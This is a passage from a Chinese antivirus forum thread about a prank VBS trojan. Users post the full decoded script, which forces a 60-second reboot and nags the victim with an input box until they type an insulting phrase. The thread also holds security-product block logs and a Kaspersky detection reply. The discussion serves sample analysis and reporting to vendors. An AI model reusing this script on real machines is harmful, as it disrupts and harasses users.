过红伞,过微点的一个可疑文件

昔我往矣

右键扫描没反应,微点直接过,打开后,自动关机,建压缩包也自动关机了一次(解压密码:infected)

qianwenxiang

又见这个VBS...

1. 
   
2. on error resume next
   
3. dim WSHshellA
   
4. set WSHshellA = wscript.createobject("wscript.shell")
   
5. WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""我是SB，我爱你，不喊我是SB，我爱你就一分钟关你机，不信，试试···"" ",0 ,true  
   
6. dim a
   
7. do while(a <> "我是SB，我爱你")
   
8. a = inputbox ("我是SB，我爱你,就不关机，快撒，喊 ""我是SB，我爱你""　","喊不喊","不喊",8000,7000)
   
9. msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
   
10. loop
    
11. msgbox chr(13) + chr(13) + chr(13) + "早喊不就行了嘛"
    
12. dim WSHshell
    
13. set WSHshell = wscript.createobject("wscript.shell")
    
14. WSHshell.run "cmd.exe /c shutdown -a",0 ,true  
    
15. msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈，真过瘾"
    

复制代码

xxwpk007

2008-08-16 18:08:38    运行应用程序      操作:阻止
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c shutdown -r -t 60 -c "我是SB，我爱你，不喊我是SB，我爱你就一分钟关你机，不信，试试···"
触发规则:所有程序规则->*

sbbdms

又是一个搞笑VBS……
Kaspersky miss
TO KL

小邪邪

查不出但防得住

mcafee后台自动拦截：
2008-8-16 18:15:30
已由访问保护规则禁止
AD 禁止在本机执行可疑的脚本文件
已阻止的操作: 执行

（这个脚本试图调用很多系统核心模块）

[ 本帖最后由 小邪邪 于 2008-8-16 18:19 编辑 ]

sbbdms

Hello,

####.vbe_ - Trojan.VBS.Shutdown.s

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Vyacheslav Zakorzhevsky
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.



> Attachment: ????.rar

qigang

RS20.57.52未杀！

Palkia

尤金卡巴斯基

MISS，已上报

浪滔天

运行后卡巴 2009 提示：